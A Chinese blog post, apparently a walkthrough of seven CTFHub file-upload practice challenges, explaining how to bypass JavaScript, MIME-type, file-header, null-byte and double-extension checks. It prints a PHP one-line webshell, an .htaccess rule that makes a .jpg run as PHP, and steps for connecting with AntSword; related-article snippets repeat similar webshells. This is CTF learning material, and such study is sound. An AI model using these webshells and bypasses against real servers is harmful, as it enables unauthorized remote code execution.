CTFhup文件上传漏洞练习

最新推荐文章于 2024-06-03 17:24:52 发布
最新推荐文章于 2024-06-03 17:24:52 发布
阅读量1k 收藏 1
点赞数 1
文章标签: php 网络安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51583379/article/details/126869068
版权

第一关_无验证

看标题我们知道,直接写一句话木马

<?php  @eval($_POST['1']);?>

然后上传shell

 

 发现上传成功我们用中国蚁🗡连接一下上传的shell地址

第二关_js验证

我们上传一个正常图片试试,发现上传成功

我们再上传一个shell试试,发现上传不了

 我们可以尝试在浏览器设置里面把js关了

 我们再上传一个shell,发现可以成功上传

 

 我们再在中国蚁🗡上面写上shell地址和shell里面的值

 第三关_MIME绕过

我们先上传一个正常的图片发现可以上传,我们再试试上传一个shell,发现上传不了

 我们试试用bp抓包,改一下里面的Content-Type:的值

 改成这三种,其中一种

image/jpeg

 

image/gif
image/png

再发包,发现上传成功了,中国蚁🗡连接成功了

第四关_.htaccess

直接写一个htaccess代码

<FilesMatch "22.jpg">
setHandler application/x-httpd-php
</FilesMatch>

上传htaccess文件

 再写一个shelll ,把它复制的一个图片里面

<?php  @eval($_POST['1']);?>

像这样在cmd 里面写 

 

 再先上传23.jpg,发现上传成功

 第五关_文件头检查

上传22.jpg 跟第四关的22.jpg一样,再bp抓包,修改后缀为php

 发现上传成功

第六关_00截断

上传一个shell发现只能用 jpg png gif 

上传一个shell.php用bp抓包,修改这个

 发现上传成功但是没有路径,但是我们记得路径是这个

http://challenge-c60015bfd263f536.sandbox.ctfhub.com:10800/upload/shell.php

用中国蚁🗡连接成功

 第七关_双写后缀

上传一个shell.php,抓包修改 成 pphphp

 

用中国蚁🗡发现连接成功

 

林1林
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传+CTF题目
unexpectedthing的博客
10-27 2389
文章目录概念:文件上传绕过:1.绕过js代码:2.绕过服务端(MIME类型)3.绕过黑名单绕过白名单图片马文件上传后利用蚁剑进行连接后门 概念: web客户端在上传文件时,没有对上传文件的内容,扩展名等进行过滤。 文件上传绕过: 1.绕过js代码: (1)一般的web网页前端在上传文件时,都会利用js代码对文件的扩展名。也就是说,如果对文件的扩展名进行过滤了,可能是js代码的作用了。 (2)方法:利用火狐的about:config来禁用js代码执行。 先使用可以使用的扩展名进行上传,利用bp抓包,改数据包扩
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传前端校验)
Onlyone_1314的博客
11-23 4603
目录标题(1)把οnchange="check();去掉(2)禁用浏览器的JS脚本运行(3)Burp Suite抓包修改文件后缀名POST方法一句话木马GET方法一句话木马蚁剑连接 打开题目地址: 是一个文件上传的题目 选择一个一句话脚本上传: 前端存在JS代码校验文件类型,如果上传的文件后缀不是jpg和png,就会让上传按钮变得不使能: 要绕过前端的JS代码校验,常见的方法有: (1)把οnchange="check();去掉 可以直接把οnchange="check();去掉,这样提交文件的时候就
CTF-Web】文件上传漏洞学习笔记(ctfshow题目)
最新发布
jayq1的博客
06-03 1579
文件上传漏洞学习笔记,ctfshow题目为依托
一道文件上传漏洞的详细靶场写题流程——适合初学者
hyjcking的博客
10-18 1048
我们上传制作的图片马,发现上传成功,我们尝试连接phpinfo,但是却发现没有生成phpinfo,猜测是没传到根目录下或者被改名字。由于apache存在的多后缀文件解析漏洞,这里上传一个x.php.xxx(这里任何不可识别的后缀都行),即可绕过该正则限制。2.打开该目录的cmd,输入copy 1.jpg/b +1.php 88.jpg,就会生成88.jpg的图片马。需要将php文件达成zip包,然后,绕过路经检测,通过路径穿越将文件放到指定目录,然后访问。3.生成66.jpg的夹心图片马。
CTF--WEB--文件上传
yanfangjie的博客
01-06 3740
前端验证 上传一个一句话木马,扩展名改成允许上传的扩展名。 在把.jpg改成.php 上传的路径在这里 我们可以使用蚁剑来连接 连接成功,得到flag。
CTFHub-Web-文件上传练习
Atkx's Blog
11-22 1993
无验证 上传一句话木马1.php <?php @eval($_POST["pass"]);?> 上传文件相对路径upload/1.php 使用蚁剑连接,连接密码为pass 查看目录,flag就在这里 前端验证 上传一句话木马,结果提示该文件不允许上传 题目是前端验证,直接查看网页源代码,发现只能上传.jpg,.png,.gif三种格式的文件 把1.php改为1.jpg,然后上传抓包 1.jpg再改为1.php,然后放包 上传成功,得到相对路径upload/1.php
文件上传漏洞详解(CTF篇)
nobugnomoney的博客
09-16 1万+
需要了解的前置知识: 1.什么是文件上传文件上传就是通过流的方式将文件写到服务器上 文件上传必须以POST提交表单 表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马
CTF-web文件上传漏洞
am_03的博客
08-23 480
文件上传漏洞 文件上传功能 文件上传流程和上传攻击 WebShell——网页木马文件 以php语言创建一句木马: 之间的gok为连接的木马 将其放入phpstudy工具的网站根目录里,即网址为http://10.0.3.23/eval.php 利用菜刀连接木马 打开后,右键添加 右键->文件管理,可以看到里面的信息 还可以模拟端 右键->数据库管理 大马介绍 一句话木马介绍 一句话木马连接 文件上传漏洞利用 登录后,点击File Upload,上传前面制
文件上传漏洞原理与实例测试
wuqiongrj的博客
07-22 1万+
0x00 什么是文件上传 为了让用户将文件上传到网站,就像是给危机服务器的恶意用户打开了另一扇门。即便如此,在今天的现代互联网的Web应用程序,它是一种常见的要求,因为它有助于提高业务效率。企业支持门户,给用户各企业员工有效地共享文件。允许用户上传图片,视频,头像和许多其他类型的文件。向用户提供的功能越多,Web应用受到攻击的风险和机会就越大,这种功能会被恶意用户利用,获
.bat文件中echo和@的用法
认知 行动 坚持
06-06 6万+
在F盘建立一个名称为myFile的文件夹, 把Windows系统的cmd.exe复制到myFile文件夹下,并在myFile中建立myBat.txt文件,改名为myBat.bat, 右击myBat.bat文件,选择文本文件的方式打开,进行编辑。以后,我就不再介绍这个简单的过程了。 在这篇文章中,我们将介绍echo的用法。我们先来复习一下这个单词吧。 echo : 回声。例句:
ctf文件上传基本思路+例题
limenzzz的博客
04-12 3795
目录 简介 一句话木马 蚁剑 例题 总结思路 附言 简介 文件上传本质上就是将文件传输到服务器时没有做好检测和过滤,导致可上传恶意程序到服务器,从而获得后台权限来干点坏事。一般这个恶意脚本文件称为webshell,通过webshell我们可以查看服务器的目录结构或文件,以及来执行一些系统指令。小马和大马,简单来说,大马是多功能,危害大,体积大的木马,小马是隐蔽性强,体量小,更方便的小木马。一句话木马就属于小马,所以较易突破防护,而大马极易被过滤。 一句话木马 首先通过看一些题解和博.
CTF从入门到提升(九)文件上传以及相关例题分享
anquanniu的博客
09-04 3686
文件上传主要是配合一些漏洞的利用,普遍意义上的文件上传是指将信息从个人计算机传送至中央计算机,也就是我们所说的远程计算机,对站点来说,就是传到运行网站的服务器上。一般网站都有自己的逻辑,比如在网站的注册页面,你想要上传个头像,网站只需要你上传头像,而不是传其他类型的文件。 CTF上传文件的目的是get shell,我们最终目的是拿到题目的flag,如果说存在一个上传的地方,很有可能它的目的就...
2016xctf一道ctf题目
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
CTF的sql注入、文件包含、文件上传突破等五道题
hclimg的博客
12-28 3268
使用win7建立一个ctf的环境,在本地测试实验 新手练习,在网上找了很多的资料   1、sql注入     http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)--+ http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)or...
腾讯犀牛鸟CTF文件上传题目解析
hxhxhxhxx的博客
07-06 346
腾讯犀牛鸟CTF文件上传题目解析 对上传功能点进行测试,发现限制了图片大小范围。 那么我们就找一个符合范围的图片。 反复尝试,发现,PHp大小写可以绕过,pht也可以绕过,同时构造头GIF89a,就可以绕过。然后蚁剑进行连接。 flag值: flag{Aa3c7c37508E40B3} ...
CTFHub技能书解题笔记-文件上传-.htaccess
qq_43006864的博客
01-05 1093
打开题目 这里好好看看题干,信息量蛮多的, 索性查查.htaccess。内容蛮多的,这里我就概括一下这道题用到的重点。 htaccess文件是Apache服务器中的一个配置文件,可以帮我们实现:改变文件扩展名。 然后,先构造一个.htaccess文件。文件内容是将文件扩展名改为PHP。方便我们执行马子。 附上文件内容:SetHandler application/x-httpd-php 打开链接 上传.htaccess文件。 然后上传.JPG格式的php马子。 其.
CTF文件上传及文件包含总结
None安全团队
12-15 4407
文件上传】 一、前端检查 前端对文件后缀进行检查,该种通过抓包修改数据包即可解决 二、文件名检查 (1)大小写绕过 在windows下,可以将后缀写为pHp (2)unicode 当目标存在json_decode且检查在json_decode之前,可以将php写为\u0070hp (3)php3457 该项为apache专属 关键点在/etc/apache2/mods-available/php5.6.conf这个文件,满足.+\.ph(p[3457]?|t|tml)$,都会被当.
上传验证绕过全解析
weixin_33941350的博客
04-19 672
目录 0x01 客户端验证绕过(javascript 扩展名检测)0x02 服务端验证绕过(http request 包检测) - Content-type (Mime type) 检测 0x03 服务端验证绕过(扩展名检测) - 黑名单检测 - 白名单检测 - .htaccess 文件攻击 0x04 服务端验证绕过(文件完整性检测) ...
【文件解析与上传】文件解析与文件上传漏洞知识总结v1.0
Monsterlz123的博客
06-19 1038
【文件解析与上传】文件解析与文件上传漏洞学习总结v1.0 Hello,各位小伙伴大家好~ 这里是依旧勤劳写公众号的小编~ 今天本公众号将推出一个新的模块,那就是漏洞知识点总结模块!!! 该模块的文章会总结各种类型的漏洞的基础理论知识,并且文章内容会不断修改,不断完善,因此该模块文章带版本号,如v1.0。 话不多说,让我们直接开始本期的内容吧~ 一、文件上传漏洞 1、什么是文件上传漏洞? 大...
ctf-web:文件上传漏洞和文件解析漏洞
热门推荐
薯片薯条的博客
10-11 9万+
这次的内容是关于文件上传漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍. 其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,还有这几个漏洞的利用就是web渗透…这不就是我好几年前看的东西么… 当然,其实我也学的不是很精通,只是稍微会一点,就不夸夸其谈了. 先说说这两个漏洞的区别. 一.文件上传漏洞 这个漏洞产生的原因是因为上传文件的不严谨所产生的.比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值